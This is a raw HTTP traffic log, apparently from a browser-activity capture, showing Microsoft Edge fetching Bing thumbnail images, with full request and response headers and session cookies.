cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7507
cache-control: public, max-age=5183962
date: Wed, 04 Dec 2024 10:08:15 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4359
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.3ca73608bac0cd5349007514cbd625ce&w=46&h=46&c=11&rs=1&qlt=80&o=6&dpr=2&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.3ca73608bac0cd5349007514cbd625ce&w=46&h=46&c=11&rs=1&qlt=80&o=6&dpr=2&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6213
x-check-cacheable: YES
cache-control: public, max-age=2431191
date: Wed, 04 Dec 2024 10:08:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306896.404f4d2a
GET

https://th.bing.com/th?id=ODL.d1dc2aff5e187a8bd51dbd73951abbba&w=100&h=100&c=12&pcl=faf9f7&o=6&pid=23.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODL.d1dc2aff5e187a8bd51dbd73951abbba&w=100&h=100&c=12&pcl=faf9f7&o=6&pid=23.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2114
cache-control: public, max-age=2591967
date: Wed, 04 Dec 2024 10:08:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306896.404f4d1a
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODL.a0453fbb04242835d1b15489b390a676&w=100&h=100&c=12&pcl=faf9f7&o=6&pid=23.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODL.a0453fbb04242835d1b15489b390a676&w=100&h=100&c=12&pcl=faf9f7&o=6&pid=23.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2022
cache-control: public, max-age=2591944
date: Wed, 04 Dec 2024 10:08:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306896.404f4d22
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OLC.enjkge4wuxclNw480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OLC.enjkge4wuxclNw480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6030
cache-control: public, max-age=2592000
date: Wed, 04 Dec 2024 10:08:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306896.404f4d29
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OLC.nXkLF6lHAiUfGQ480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OLC.nXkLF6lHAiUfGQ480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2228
cache-control: public, max-age=2592000
date: Wed, 04 Dec 2024 10:08:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306896.404f4d28
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.3ca73608bac0cd5349007514cbd625ce&w=102&h=102&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.3ca73608bac0cd5349007514cbd625ce&w=102&h=102&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1890
cache-control: public, max-age=2591993
date: Wed, 04 Dec 2024 10:08:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306896.404f4d2b
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.IsRnev_WQ6d0GHyWRL00cgHaEL&w=80&h=80&c=1&vt=9&bgcl=d7fade&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.IsRnev_WQ6d0GHyWRL00cgHaEL&w=80&h=80&c=1&vt=9&bgcl=d7fade&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHS=PC=U531
